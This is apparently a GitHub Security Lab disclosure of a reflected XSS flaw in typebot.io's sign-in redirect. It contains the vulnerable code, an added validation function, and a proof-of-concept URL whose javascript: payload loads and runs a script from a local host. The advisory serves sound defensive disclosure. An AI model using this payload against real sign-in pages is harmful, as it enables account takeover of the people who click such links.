Coordinated Disclosure Timeline

Summary

A reflected cross-site scripting (XSS) in the sign-in page of typebot.io may allow an attacker to hijack a user’s account.

Project

typebot.io

Tested Version

v2.23.0

Details

Reflected XSS in SignInForm.tsx (GHSL-2024-040)

The sign-in page reads the redirectPath query parameter from the URL and passes it to the router without validating its scheme. If a user clicks a link whose redirectPath parameter uses the javascript: scheme, the attacker who crafted the link may be able to execute arbitrary JavaScript with the privileges of that user.

export const SignInForm = ({
  defaultEmail,
}: Props & HTMLChakraProps<'form'>) => {
  const { t } = useTranslate()
  const router = useRouter()
  const { status } = useSession()
  const [authLoading, setAuthLoading] = useState(false)
  const [isLoadingProviders, setIsLoadingProviders] = useState(true)

  const [emailValue, setEmailValue] = useState(defaultEmail ?? '')
  const [isMagicLinkSent, setIsMagicLinkSent] = useState(false)

  const { showToast } = useToast()
  const [providers, setProviders] =
    useState<
      Record<LiteralUnion<BuiltInProviderType, string>, ClientSafeProvider>
    >()

  const hasNoAuthProvider =
    !isLoadingProviders && Object.keys(providers ?? {}).length === 0

  useEffect(() => {
    if (status === 'authenticated') {
      router.replace(router.query.redirectPath?.toString() ?? '/typebots') // <------ URL redirected to query parameter
      return
    }

This vulnerability was found with the help of CodeQL's Reflected XSS query.
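The root cause above is that a user-controlled value reaches router.replace() with no check on what kind of URL it is. The following added example (not typebot.io's code and not its actual fix) shows one way to validate such a value before redirecting: it accepts only same-origin, path-only relative URLs and falls back to the default '/typebots' route from the excerpt for everything else. The function name safeRedirectPath, the placeholder base origin and the sample inputs are all assumptions made for this illustration.

```typescript
// Added example, not part of typebot.io: validate a redirectPath query value
// before passing it to router.replace(). Only a same-origin relative path is
// accepted; anything else falls back to a fixed default route.

const DEFAULT_REDIRECT = '/typebots' // default route taken from the vulnerable excerpt

// Exactly one leading slash: rejects "javascript:...", "https://evil.example",
// protocol-relative "//evil.example" and the backslash variant "/\evil.example".
const SINGLE_SLASH_PATH = /^\/(?![\/\\])/

// Placeholder origin used only to resolve the candidate with the WHATWG URL parser.
const PLACEHOLDER_BASE = 'https://placeholder.invalid'

function parseOrNull(candidate: string): URL | null {
  try {
    return new URL(candidate, PLACEHOLDER_BASE)
  } catch {
    return null
  }
}

function safeRedirectPath(raw: unknown, fallback: string = DEFAULT_REDIRECT): string {
  // router.query values can be string, string[] or undefined; only a string is considered.
  if (typeof raw !== 'string') return fallback

  // Browsers drop tab/newline anywhere in a URL and leading/trailing whitespace,
  // so "\tjavascript:" would still run; normalise the same way before checking.
  const candidate = raw.replace(/[\t\n\r]/g, '').trim()
  if (!SINGLE_SLASH_PATH.test(candidate)) return fallback

  // Let the URL parser resolve dot segments and confirm the origin is unchanged.
  const parsed = parseOrNull(candidate)
  if (parsed === null || parsed.origin !== PLACEHOLDER_BASE) return fallback

  // Re-check after normalisation: "/..//evil.example" resolves to the path
  // "//evil.example", which a router would treat as protocol-relative.
  const relative = parsed.pathname + parsed.search + parsed.hash
  return SINGLE_SLASH_PATH.test(relative) ? relative : fallback
}

// Intended use inside the effect from the excerpt (assumed wiring, not the project's code):
//   router.replace(safeRedirectPath(router.query.redirectPath))
```

An allow-list of known application routes would be stricter still, but the check above already removes the javascript: vector described in this advisory and the open-redirect variants that typically accompany it.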

Impact

This issue may lead to Account Takeover.

Proof of Concept

The following link loads a JavaScript file from localhost and executes it in the context of the current ___domain. An attacker can use the same payload to load JavaScript from a host they control and execute it in the victim's origin.

https://app.typebot.io/signin?redirectPath=javascript:var%20script%20=%20document.createElement(%27script%27);script.src%20=%20%27http://127.0.0.1:8765/alert.js%27;%20document.head.appendChild(script);#//

CVE

Resources

Credit

This issue was discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).

Contact

You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2024-040 in any communication regarding this issue.